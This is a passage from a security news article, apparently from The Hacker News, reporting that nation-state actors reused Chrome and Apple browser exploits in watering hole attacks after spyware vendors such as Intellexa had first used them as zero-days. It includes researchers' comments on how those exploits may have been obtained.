What's more, the exploit for CVE-2024-4671 is said to share similarities with a previous Chrome sandbox escape that Intellexa was discovered as using in the wild in connection with another Chrome flaw CVE-2021-37973, which was addressed by Google in September 2021.

While it's currently not clear how the attackers managed to acquire the exploits for the three flaws, the findings make it amply clear that nation-state actors are using n-day exploits that were originally used as zero-days by CSVs.

It, however, raises the possibility that the exploits may have been procured from a vulnerability broker who previously sold them to the spyware vendors as zero-days, a steady supply of which keeps the ball rolling as Apple and Google shore up defenses.

"Moreover, watering hole attacks remain a threat where sophisticated exploits can be utilized to target those that visit sites regularly, including on mobile devices," the researchers said. "Watering holes can still be an effective avenue for n-day exploits by mass targeting a population that might still run unpatched browsers."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#apple